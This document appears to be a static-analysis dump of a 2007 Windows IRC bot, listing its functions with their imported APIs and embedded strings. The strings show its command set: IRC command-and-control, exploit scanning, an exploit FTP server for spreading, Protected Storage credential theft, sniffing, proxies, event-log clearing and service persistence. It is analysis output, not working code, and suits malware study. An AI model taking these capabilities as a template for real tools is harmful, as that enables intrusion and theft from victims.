sub_outside():
MSVCRT.sprintf
MSVCRT.strncat
WS2_32.htonl
MSVCRT.rand
WS2_32.inet_ntoa
WS2_32.socket
WS2_32.htons
WS2_32.ioctlsocket
WS2_32.connect
WS2_32.select
WS2_32.closesocket
WS2_32.inet_addr
WS2_32.WSASocketA
WS2_32.send
WS2_32.recv
WININET.InternetGetConnectedStateEx
WS2_32.gethostbyname
WS2_32.gethostbyaddr
MSVCRT.atoi
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegEnumKeyExA
ADVAPI32.RegQueryValueExA
MSVCRT.strstr
ADVAPI32.OpenSCManagerA
ADVAPI32.OpenServiceA
ADVAPI32.ControlService
ADVAPI32.CloseServiceHandle
ADVAPI32.LsaOpenPolicy
ADVAPI32.LsaEnumerateAccountsWithUserRight
ADVAPI32.LsaFreeMemory
ADVAPI32.LsaClose
DNSAPI.DnsFlushResolverCache
|
sub_4013A5(0203):
WS2_32.inet_ntoa
"SC:"
"%s Current IP: %s."
"SC:"
"%s Scan not active."
|
sub_410F7B(0251):
ADVAPI32.OpenSCManagerA
ADVAPI32.OpenServiceA
ADVAPI32.LockServiceDatabase
ADVAPI32.QueryServiceLockStatusA
ADVAPI32.ChangeServiceConfig2A
ADVAPI32.UnlockServiceDatabase
ADVAPI32.CloseServiceHandle
"Register Manager"
|
sub_40A46A(0259):
"NOTICE %s :%s\r\n"
|
sub_40E935(0304):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegQueryValueExA
ADVAPI32.RegCloseKey
|
sub_408150(03aa):
"A:\\"
"Drive Totals (N/A), total: %s%s, free: "...
|
sub_40A5D1(1036):
"JOIN %s %s\r\n"
|
sub_410873(119c):
ADVAPI32.LsaLookupNames2
ADVAPI32.LsaFreeMemory
|
sub_410836(14b2):
ADVAPI32.LsaAddAccountRights
ADVAPI32.LsaRemoveAccountRights
|
sub_40D2E1(18de):
"Go fuck yourself %s."
|
sub_40C742(1cca):
"%s"
"Error: <%d>"
|
sub_40F74A(1e77):
MSVCRT.wcslen
ADVAPI32.RegCloseKey
"%s\\trash%X"
"\\sfc.dll"
"\\sfc_os.dll"
|
sub_40F111(21b7):
MSVCRT._snprintf
"%s\\ftp.exe"
"%s\\dllcache\\ftp.exe"
"%s\\microsoft\\backup.ftp"
"%s\\tftp.exe"
"%s\\dllcache\\tftp.exe"
"%s\\microsoft\\backup.tftp"
|
sub_411F09(243d):
"T:"
"%s %s thread stopped. (%d thread(s) sto"...
"T:"
"%s No %s thread found."
|
sub_4112F4(2776):
WS2_32.recv
MSVCRT.fread
WS2_32.send
WS2_32.closesocket
WS2_32.socket
WS2_32.setsockopt
WS2_32.htons
WS2_32.bind
WS2_32.listen
WS2_32.accept
"rb"
|
sub_408266(2dbf):
"KB"
"MB"
"GB"
"DRI:"
"%s Listing drives:"
"A:\\"
"KB"
"MB"
"GB"
"KB"
"MB"
"GB"
"DRI:"
"%s End of list."
|
sub_4028B7(37ef):
MSVCRT.rand
"%s\\%s\\%s"
"%d%d%d%d%d.exe"
"%s\\%s\\%s"
"(Blank)"
"netapi139"
"SC:"
"%s %s: Exploiting IP: %s\\%s, %s/%s (Cre"...
"(Blank)"
"netapi139"
"SC:"
"%s %s: Exploiting IP: %s\\%s, %s/%s (Net"...
"(Blank)"
"netapi139"
"SC:"
"%s %s: Failed to exploit IP: %s\\%s, %s/"...
|
sub_40E715(3df9):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegQueryInfoKeyA
ADVAPI32.RegEnumKeyExA
ADVAPI32.RegEnumValueA
ADVAPI32.RegCloseKey
"(%.2d) %s\\%s"
|
sub_412A82(3f47):
ADVAPI32.OpenSCManagerA
ADVAPI32.EnumServicesStatusA
ADVAPI32.CloseServiceHandle
|
sub_40A135(3fef):
"QUIT %s\r\n"
"QUIT\r\n"
|
sub_41216E(4276):
"Shell"
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
|
sub_40D384(4290):
MSVCRT.strncpy
MSVCRT.strstr
MSVCRT.strtok
"$dec("
")"
"|"
"topic"
"%s"
|
sub_40BBCF(43bb):
"Kernel32.dll failed. <%d>"
"User32.dll failed. <%d>"
"Advapi32.dll failed. <%d>"
"Parts of Advapi32.dll failed. (Lsa Rest"...
"Gdi32.dll failed. <%d>"
"Ws2_32.dll failed. <%d>"
"Wininet.dll failed. <%d>"
"Icmp.dll failed. <%d>"
"Netapi32.dll failed. <%d>"
"Dnsapi.dll failed. <%d>"
"Iphlpapi.dll failed. <%d>"
"Parts of Iphlpapi.dll failed. (Netstatp"...
"Mpr32.dll failed. <%d>"
"Shell32.dll failed. <%d>"
"Odbc32.dll failed. <%d>"
"Psapi.dll failed. <%d>"
"PStore.dll failed. <%d>"
"Shlwapi.dll failed. <%d>"
"M:"
"%s DLL test complete."
|
sub_40F700(449e):
MSVCRT.wcslen
|
sub_4080AA(45b0):
"failed"
|
sub_411186(4b09):
WS2_32.htons
|
sub_408C03(4b3a):
WS2_32.closesocket
"Exploit FTPD"
"T:"
"%s %s stopped. (%d thread(s) stopped.)"
"Exploit FTPD"
"T:"
"%s No %s thread found."
|
sub_40EA49(4bcf):
ADVAPI32.RegCreateKeyExA
ADVAPI32.RegSetValueExA
ADVAPI32.RegCloseKey
|
sub_40AB66(4ebd):
WININET.InternetOpenA
"kernel32.dll"
"SetErrorMode"
"CreateToolhelp32Snapshot"
"Process32First"
"GetDiskFreeSpaceExA"
"GetLogicalDriveStringsA"
"SearchPathA"
"QueryPerformanceCounter"
"QueryPerformanceFrequency"
"GetComputerNameA"
"RegisterServiceProcess"
"user32.dll"
"CloseWindow"
"SendMessageA"
"FindWindowA"
"IsWindow"
"GetClipboardData"
"CloseClipboard"
"GetAsyncKeyState"
"GetKeyState"
"GetWindowTextA"
"GetForegroundWindow"
"EnumWindows"
"GetWindowThreadProcessId"
"ShowWindow"
"IsWindowVisible"
"advapi32.dll"
"RegCreateKeyExA"
"RegSetValueExA"
"RegQueryValueExA"
"RegDeleteValueA"
"RegCloseKey"
"RegQueryInfoKeyA"
"OpenThreadToken"
"OpenProcessToken"
"LookupPrivilegeValueA"
"AdjustTokenPrivileges"
"LsaEnumerateAccountsWithUserRight"
"LsaLookupNames2"
"LsaAddAccountRights"
"LsaRemoveAccountRights"
"LsaClose"
"LsaNtStatusToWinError"
"OpenSCManagerA"
"OpenServiceA"
"ControlService"
"CloseServiceHandle"
"EnumServicesStatusA"
"IsValidSecurityDescriptor"
"CreateServiceA"
"StartServiceCtrlDispatcherA"
"ImpersonateLoggedOnUser"
"LockServiceDatabase"
"QueryServiceLockStatusA"
"ChangeServiceConfig2A"
"UnlockServiceDatabase"
"RegisterServiceCtrlHandlerA"
"SetServiceStatus"
"GetUserNameA"
"ClearEventLogA"
"gdi32.dll"
"CreateDCA"
"CreateDIBSection"
"CreateCompatibleDC"
"GetDIBColorTable"
"SelectObject"
"BitBlt"
"DeleteDC"
"DeleteObject"
"ws2_32.dll"
"WSAStartup"
"WSASocketA"
"WSAAsyncSelect"
"__WSAFDIsSet"
"WSAIoctl"
"WSAGetLastError"
"WSACleanup"
"socket"
"ioctlsocket"
"connect"
"inet_ntoa"
"inet_addr"
"htons"
"htonl"
"ntohs"
"ntohl"
"send"
"sendto"
"recv"
"recvfrom"
"bind"
"select"
"listen"
"accept"
"setsockopt"
"getsockname"
"gethostname"
"getpeername"
"closesocket"
"shutdown"
"wininet.dll"
"InternetGetConnectedState"
"InternetGetConnectedStateEx"
"HttpOpenRequestA"
"HttpSendRequestA"
"FtpGetFileA"
"FtpPutFileA"
"InternetConnectA"
"InternetOpenUrlA"
"InternetCrackUrlA"
"InternetReadFile"
"InternetCloseHandle"
"Mozilla/4.0 (compatible)"
"icmp.dll"
"IcmpCreateFile"
"IcmpCloseHandle"
"IcmpSendEcho"
"netapi32.dll"
"NetShareAdd"
"NetShareDel"
"NetShareEnum"
"NetScheduleJobAdd"
"NetApiBufferFree"
"NetRemoteTOD"
"NetUserAdd"
"NetUserDel"
"NetUserEnum"
"NetUserGetInfo"
"NetMessageBufferSend"
"dnsapi.dll"
"DnsFlushResolverCache"
"DnsFlushResolverCacheEntry_A"
"iphlpapi.dll"
"DeleteIpNetEntry"
"GetIfTable"
"GetTcpTable"
"GetUdpTable"
"GetNetworkParams"
"mpr.dll"
"WNetAddConnection2A"
"WNetAddConnection2W"
"WNetCancelConnection2A"
"WNetCancelConnection2W"
"shell32.dll"
"SHChangeNotify"
"odbc32.dll"
"SQLDriverConnect"
"SQLAllocHandle"
"psapi.dll"
"GetModuleFileNameExA"
"GetModuleBaseNameA"
"EnumProcessModules"
"GetProcessMemoryInfo"
"pstorec.dll"
"PStoreCreateInstance"
"shlwapi.dll"
"PathRemoveFileSpecA"
|
sub_40A4C7(5075):
"PRIVMSG %s :%s\r\n"
|
sub_40A619(50d5):
"%s\r\n"
|
sub_412A2F(52fc):
ADVAPI32.OpenProcessToken
ADVAPI32.ImpersonateLoggedOnUser
|
sub_4128DA(5ad1):
IPHLPAPI.GetIpNetTable
IPHLPAPI.DeleteIpNetEntry
|
sub_411DDD(5df7):
WS2_32.closesocket
|
sub_40E42E(66f1):
"HKEY_LOCAL_MACHINE"
|
sub_40A734(6739):
KERNEL32.GetComputerNameA
"Error"
|
sub_40A103(69b2):
WS2_32.shutdown
WS2_32.closesocket
"Leaving"
|
sub_402F8A(6afd):
ADVAPI32.OpenEventLogA
ADVAPI32.ClearEventLogA
ADVAPI32.CloseEventLog
USER32.FindWindowA
MSVCRT.sprintf
USER32.SendMessageA
MSVCRT._snprintf
MSVCRT.atoi
MSVCRT.strstr
MSVCRT._strlwr
WININET.InternetGetConnectedStateEx
KERNEL32.QueryPerformanceCounter
KERNEL32.QueryPerformanceFrequency
WS2_32.getsockname
WS2_32.inet_ntoa
MSVCRT.strrchr
MSVCRT.rand
MSVCRT.fgets
WS2_32.inet_addr
WS2_32.gethostbyaddr
WS2_32.gethostbyname
DNSAPI.DnsFlushResolverCache
MSVCRT.strncpy
WS2_32.WSACleanup
"login"
"l"
"logout"
"lo"
"remove"
"bye"
"threads"
"t"
"process"
"ps"
"secure"
"sec"
"unsecure"
"unsec"
"exploitftpd"
"eftpd"
"driveinfo"
"di"
"scanall"
"sa"
"ntscan"
"nts"
"lsascan"
"lsa"
"advscan"
"asc"
"banner"
"ban"
"sniffer"
"sniff"
"pstore"
"pst"
"down"
"wget"
"update"
"upd"
"socks4"
"s4"
"redirect"
"rd"
"Redirect thread"
"Socks4 Server"
"Update"
"Download"
"Protected Storage"
"Scanner"
"Drive list"
"Secure"
"Process"
"Thread list"
"login"
"l"
"encrypt"
"enc"
"encrypt2"
"enc2"
"server"
"srv"
"logout"
"lo"
"who"
"remove"
"bye"
"testdlls"
"cel"
"M:"
"%s Cleared %d/%d event logs."
"M:"
"%s Failed to clear event logs."
"M:"
"%s Advapi.dll is not loaded."
"threads"
"t"
"sniffer"
"sniff"
"uptime"
"up"
"installed"
"it"
"version"
"v"
"status"
"s"
"open"
"o"
"secure"
"sec"
"unsecure"
"unsec"
"process"
"ps"
"nickupdate"
"nu"
"randnick"
"rand"
"exploitftpd"
"eftpd"
"iestart"
"ies"
"join"
"j"
"part"
"p"
"raw"
"r"
"prefix"
"pr"
"flusharp"
"farp"
"flushdns"
"fdns"
"resolve"
"dns"
"pstore"
"pst"
"sysinfo"
"si"
"netinfo"
"ni"
"driveinfo"
"di"
"system"
"sys"
"file"
"f"
"down"
"wget"
"update"
"upd"
"stats"
"st"
"currentip"
"cip"
"advscan"
"asc"
"scanall"
"sa"
"ntscan"
"nts"
"if"
"i"
"else"
"e"
"regctrl"
"reg"
"mircinfo"
"minfo"
"mIRC"
"$version"
"%s"
"$me"
"%s"
"$server"
"%s"
"$serverip"
"%s"
"$port"
"%s"
"$chan(0)"
"$chan(%i)"
", "
"."
"MI:"
"%s User is running mIRC %s, connected t"...
"MI:"
"%s Client not open."
"delete"
"d"
"query"
"q"
"write"
"w"
"R:"
"%s Successfully wrote: %s\\%s\\%s (%d)"
"R:"
"%s Failed to write: %s\\%s\\%s (%d)"
"R:"
"R:"
"%s Failed to write: %s\\%s\\%s (%s)"
"R:"
"R:"
"%s Done with query: %s\\%s"
"%s Failed to query: %s\\%s"
"R:"
"%s Query: %s\\%s\\%s: %d"
"%s"
"\n"
"%s"
"R:"
"%s Finished displaying: %s\\%s\\%s"
"R:"
"%s Query: %s\\%s\\%s: %s"
"R:"
"%s Failed to query: %s\\%s\\%s"
"*"
"R:"
"*"
"R:"
"%s Failed to erase key: %s\\%s\\%s"
"i"
"else"
"e"
"nick"
"n"
"host"
"h"
"LO:"
"%s Trying to get external IP."
"*"
"?"
"*"
"?"
"*"
"?"
"*"
"?"
"*"
"?"
"appi"
"app"
"%s"
"%s %s"
"id"
"g5t2b8f5o2d8"
"uptime"
"up"
"file"
"f"
"connected"
"con"
"recordup"
"rup"
"private"
"p"
"dialup"
"d"
"status"
"s"
"os"
"95"
"nt"
"98"
"me"
"2k"
"xp"
"2k3"
"inip"
"*"
"?"
"exip"
"*"
"?"
"LO:"
"%s Failed to parse command."
"scanning"
"scan"
"LO:"
"%s Missing parameter(s)."
"%s"
" %s"
"LO:"
"%s Should run: \"%s\"."
"LO:"
"ntscan"
"nts"
"SC:"
"%s Already scanning with %d threads. To"...
"netapi139"
"SC:"
"%s Failed to start scan, port is invali"...
"x.x.x.x"
"%d.x.x.x"
"SC:"
"%s Trying to get external IP."
"Random"
"Sequential"
"%s Failed to start scan thread, error: "...
"SC:"
"%s Failed to start scan, no IP specifie"...
"SC:"
"%s Could not parse external IP."
"SC:"
"SC:"
"%s Already scanning with %d threads. To"...
"banner"
"SC:"
"%s Failed to start scan, port is invali"...
"SC:"
"%s Failed to start scan, port is invali"...
"x.x.x.x"
"%d.x.x.x"
"SC:"
"%s Trying to get external IP."
"SC:"
"%s Could not parse external IP."
"SC:"
"%s No subnet class specified, try \"-a\" "...
"Random"
"Sequential"
"UPD:"
"g5t2b8f5o2d8"
"transfer thread"
"UPD:"
"%s %s already running at thread number:"...
"%s%d%d%d%d%d.exe"
"%s Downloading update from: %s to: %s."
"%s Failed to start %s, error: <%d>."
"transfer thread"
"DOWN:"
"DOWN:"
"%s"
" %s"
"type"
"cat"
"exists"
"ex"
"del"
"rm"
"rmdir"
"FI:"
"%s Folder deleted: %s"
"FI:"
"%s Failed to delete folder: %s"
"FI:"
"%s %s is not a folder."
"FI:"
"%s %s doesn't exist."
"move"
"mv"
"copy"
"cp"
"attrib"
"at"
"open"
"op"
"open"
"FI:"
"%s Opened: \"%s\"."
"FI:"
"%s Failed to open: \"%s\", error: <%d>"
"FI:"
"%s Attibutes set to: \"%s\"."
"FI:"
"%s Failed to set attibutes to: \"%s\", er"...
"FI:"
"FI:"
"%s Copied: \"%s\" to: \"%s\""
"FI:"
"%s Failed to copy: \"%s\" to: \"%s\", error"...
"FI:"
"%s Moved: \"%s\" to: \"%s\""
"FI:"
"%s Failed to move: \"%s\" to: \"%s\", error"...
"FI:"
"FI:"
"%s Failed to delete file: %s, error: <%"...
"FI:"
"%s File exists: %s"
"%s"
" %s"
"r"
"FI:"
"%s Displaying file: %s"
"%s"
"FI:"
"%s File displayed: %s"
"FI:"
"%s Failed to read file: %s, error: <%d>"...
"M:"
"%s System call failed."
"M:"
"%s System call sent: \"%s\""
"Drive list thread"
"DRI:"
"mb"
"gb"
"total"
"t"
"KB"
"MB"
"GB"
"DRI:"
"%s Drive list thread."
"Drive list thread"
"NETI:"
"%s Trying to get external IP."
"gb"
"mb"
"Protected storage thread"
"PS:"
"M:"
"%s Lookup: %s -> %s."
"M:"
"%s Could not resolve hostname."
"M:"
"%s DNS cache flushed."
"M:"
"%s Failed to flush DNS cache."
"M:"
"%s Failed to load dnsapi.dll."
"M:"
"%s ARP cache flushed."
"M:"
"%s Failed to flush ARP cache."
"I:"
"M:"
"%s Prefix changed to: '%c'."
"I:"
"Start Page"
"Software\\Microsoft\\Internet Explorer\\Ma"...
"M:"
"%s Error retrieving start page."
"M:"
"%s Current Internet Explorer start page"...
"Start Page"
"Software\\Microsoft\\Internet Explorer\\Ma"...
"M:"
"%s Set Internet Explorer start page to:"...
"M:"
"%s Failed to set the Internet Explorer "...
"FT:"
"%s Exploit FTPD is running on port: %i,"...
"FT:"
"%s Server started, Port: %i, File: %s."
"%s Exploit FTPD enabled on port: %i, th"...
"Exploit FTPD"
"P:"
"P:"
"list"
"P:"
"kill"
"del"
"P:"
"%s Process thread."
"%s Failed to start %s, error: <%d>."
"create"
"P:"
"%s Create process thread."
"sec"
"Secure thread"
"S:"
"Secure thread"
"Unsecure thread"
"S:"
"UNS:"
"[SHELL]: File opened: %s"
"[SHELL]: Couldn't open file: %s"
"Scanning"
"Idle"
"M:"
"%s Status: %s. Box Uptime: %s, Bot Upti"...
"g5t2b8f5o2d8"
". Built on: Jun 9 2007."
". Built on: Jun 9 2007."
"g5t2b8f5o2d8"
"regent"
"M:"
"%s %s (%s)%s"
"M:"
"%s Bot installed on: %s."
"SNI:"
"%s Started packet sniffer."
"kill"
"k"
"T:"
"%s Stopped: <%d> thread(s)."
"T:"
"%s No active threads found."
"T:"
"%s Killed thread: <%s>"
"T:"
"%s Failed to kill thread: <%s>"
"T:"
"sub"
"T:"
"%s Thread listing."
"%s Failed to start %s, error: <%d>."
"*"
"Remove command received from: %s!%s@%s"
"M:"
"%s Slot <%i> logged out."
"M:"
"%s No user logged in at slot: <%i>"
"M:"
"%s Invalid login slot number: <%i>"
"M:"
"%s User %s logged out."
" (SSL)"
"M:"
"%s: Current Server: %i: %s:%d%s"
"list"
"M:"
"%s Server List:"
" (SSL)"
"%i: %s:%d%s, %s"
"M:"
"%s Server List complete."
"jump"
"M:"
"%s Missing parameter(s)."
"Changing servers"
"M:"
"%s Invalid server."
"M:"
"%s Cipher text: \"%s\""
"M:"
"%s You are already logged in."
|
sub_40F67D(6cf6):
ADVAPI32.OpenProcessToken
ADVAPI32.LookupPrivilegeValueA
ADVAPI32.AdjustTokenPrivileges
"SeDebugPrivilege"
|
sub_412077(6d80):
MSVCRT.strtok
" "
|
sub_4134DD(6e81):
WS2_32.select
WS2_32.__WSAFDIsSet
WS2_32.recv
|
sub_407ED3(6ec9):
MSVCRT._snprintf
MSVCRT.sprintf
"%s%s"
"failed"
|
sub_4120F7(708e):
MSVCRT.fread
"rb"
|
sub_40E5EF(7115):
ADVAPI32.RegDeleteKeyA
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegEnumKeyExA
ADVAPI32.RegDeleteValueA
ADVAPI32.RegCloseKey
|
sub_408AA3(74d4):
WS2_32.socket
WS2_32.inet_addr
WS2_32.htons
WS2_32.connect
WS2_32.WSAGetLastError
WS2_32.closesocket
"FT:"
"%s Couldn't open data connection to: %s"...
|
sub_409EFC(756f):
"M:"
"%s Login List:"
"<%i> %s!%s@%s"
"<%i> "
"M:"
"%s Login List complete."
|
sub_4110D5(759b):
MSVCRT.rand
|
sub_40C01B(7712):
MSVCRT.strncpy
WS2_32.inet_addr
WS2_32.gethostbyaddr
"Couldn't resolve host"
|
sub_40CB30(85c0):
ADVAPI32.OpenThreadToken
ADVAPI32.OpenProcessToken
ADVAPI32.LookupPrivilegeValueA
ADVAPI32.AdjustTokenPrivileges
"SeDebugPrivilege"
|
sub_40A63B(9131):
"MODE %s %s\r\n"
"MODE %s %s %s\r\n"
|
sub_41355D(981b):
WS2_32.htonl
WS2_32.send
|
sub_40173A(9a45):
WS2_32.inet_addr
WS2_32.inet_ntoa
"SC:"
"%s Failed to initialize critical sectio"...
"SC:"
"%s %s:%d, Scan thread: %d, Sub-thread: "...
"SC:"
"%s Finished at %s:%d after %d minute(s)"...
"Scanner"
|
sub_40841E(9c18):
WS2_32.socket
WS2_32.setsockopt
WS2_32.ioctlsocket
WS2_32.htons
WS2_32.bind
WS2_32.listen
WS2_32.select
WS2_32.__WSAFDIsSet
WS2_32.accept
WS2_32.send
WS2_32.recv
WS2_32.closesocket
MSVCRT.sscanf
MSVCRT.atoi
"220 Reptile welcomes you..\r\n"
"%s %s"
"USER"
"331 Password required\r\n"
"PASS"
"230 User logged in.\r\n"
"SYST"
"215 StnyFtpd\r\n"
"REST"
"350 Restarting.\r\n"
"257 \"/\" is current directory.\r\n"
"TYPE"
"A"
"200 Type set to A.\r\n"
"TYPE"
"I"
"200 Type set to I.\r\n"
"PASV"
"425 Passive not supported on this serve"...
"LIST"
"226 Transfer complete\r\n"
"FT:"
"WARN:"
"%s %s LIST request from: %s"
"FT:"
"WARN:"
"%s %s LIST request from: %s"
"PORT"
"%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
"RETR"
"FT:"
"%s Started send to IP: %s."
"150 Opening BINARY mode data connection"...
"226 Transfer complete.\n"
"FT:"
"%s File transfer complete to IP: %s, Fi"...
"FT:"
"%s File transfer complete to IP: %s."
"425 Can't open data connection.\n"
"QUIT"
"221 Goodbye, happy rooting.\r\n"
"503 Command not understood.\r\n"
|
sub_402680(a09b):
ADVAPI32.OpenSCManagerA
MSVCRT.sprintf
MSVCRT.rand
ADVAPI32.CreateServiceA
ADVAPI32.StartServiceA
ADVAPI32.DeleteService
ADVAPI32.CloseServiceHandle
ADVAPI32.OpenServiceA
"ServicesActive"
"%s\\%s\\%s"
"%d%d%d%d%d"
"Register Manager"
|
sub_40CC4E(a1e7):
"???"
"%s"
|
sub_41367E(a2f7):
WS2_32.send
|
sub_410EE7(a315):
ADVAPI32.OpenSCManagerA
ADVAPI32.OpenServiceA
ADVAPI32.StartServiceA
ADVAPI32.CloseServiceHandle
"Register Manager"
|
sub_40F073(a7b2):
MSVCRT.fwrite
"r+b"
"MZ"
|
sub_40AB35(a7cf):
"NICK %s\r\n"
|
sub_408E89(acb8):
"13"
"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVe"...
|
sub_401000(ad7e):
MSVCRT.sprintf
MSVCRT.strncat
"SC:"
"%s Exploit Statistics:"
"netapi139"
"banner"
" %s: %d,"
|
sub_40A5AF(affa):
"JOIN %s\r\n"
|
sub_40A524(b8d8):
MSVCRT._strlwr
"PRIVMSG %s :%s\r\n"
|
sub_401661(bf1c):
WS2_32.inet_ntoa
|
sub_412230(c09a):
MSVCRT.strtok
|
sub_412644(c284):
MSVCRT.rand
MSVCRT.sprintf
"%s\\removeMe%i%i%i%i.bat"
"@echo off\r\n:Repeat\r\ndel \"%s\">nul\r\nping "...
"@echo off\r\n:Repeat\r\ndel \"%s\">nul\r\nif ex"...
|
sub_4092C2(c366):
IPHLPAPI.GetIfTable
|
sub_40CBD2(c3c5):
ADVAPI32.AdjustTokenPrivileges
|
sub_407E37(c8a3):
"?"
"Cdrom"
"Network"
"Disk"
"Invalid"
"Unknown"
|
sub_4013F9(caf5):
MSVCRT.strncpy
"ShellCode Server started, Port: %i"
"FT:"
"%s Server started, Port: %i, File: %s."
|
sub_411129(cc4d):
WS2_32.getpeername
WS2_32.gethostbyaddr
WS2_32.inet_ntoa
|
sub_412C8A(d117):
"%s"
|
sub_410E40(d1f3):
ADVAPI32.OpenSCManagerA
ADVAPI32.CreateServiceA
ADVAPI32.CloseServiceHandle
"\"%s\""
"Register Manager"
"Register Manager"
"Register Manager"
|
sub_40E8BF(d743):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegQueryValueExA
ADVAPI32.RegCloseKey
|
sub_40A5F7(d89e):
"PART %s\r\n"
|
sub_40C084(df95):
"10"
"172"
"16"
"192"
"168"
"90"
"0"
|
sub_408F9D(e41a):
MSVCRT.sprintf
ADVAPI32.GetUserNameA
KERNEL32.GetComputerNameA
"???"
"95"
"NT"
"98"
"ME"
"2K"
"XP"
"2003"
"%s (%s)"
"dd:MMM:yyyy"
"HH:mm:ss"
|
sub_408E08(e649):
"13"
"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVe"...
"13"
"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVe"...
|
sub_40E50C(e69a):
"REG_SZ"
"SZ"
"EX"
"REG_MULTI_SZ"
"MU"
"REG_DWORD"
"DW"
|
sub_412764(e9c3):
ADVAPI32.OpenSCManagerA
ADVAPI32.OpenServiceA
ADVAPI32.DeleteService
"Register Manager"
"13"
"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVe"...
"14"
"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVe"...
|
sub_408B2A(ea2e):
MSVCRT.fseek
WS2_32.closesocket
"rb"
|
sub_40A205(ec76):
MSVCRT.strstr
"\r\n"
|
sub_40F5E3(eda7):
MSVCRT.malloc
MSVCRT.wcsncmp
MSVCRT.wcscpy
MSVCRT.free
"\\??\\"
|
sub_412D0A(eec2):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegQueryValueExA
ADVAPI32.RegCloseKey
"SOFTWARE\\Kazaa\\LocalContent"
"DownloadDir"
"\\"
"*.*"
"exe"
|
sub_40A245(efd0):
MSVCRT.strchr
"JOIN"
"PART"
"QUIT"
"NOTICE"
"PRIVMSG"
"NICK"
"PING"
"PONG %s\r\n"
|
sub_40C927(effb):
ADVAPI32.OpenThreadToken
ADVAPI32.OpenProcessToken
ADVAPI32.LookupPrivilegeValueA
ADVAPI32.AdjustTokenPrivileges
"SeDebugPrivilege"
"%i"
|
sub_413177(f1cc):
"BBBB"
"CCCC"
"0"
|
sub_401298(faf0):
MSVCRT.sprintf
"x"
"0"
"x"
"0"
"x"
"0"
"%s.%s.%s.%s"
|
sub_40BEB9(fd16):
WININET.InternetOpenA
WININET.InternetOpenUrlA
WININET.InternetReadFile
WININET.InternetCloseHandle
"ww2.dokidoki.ne.jp/tomocrus/cgi-bin/che"...
"%s%%s"
|
sub_407E80(fd53):
KERNEL32.SetErrorMode
|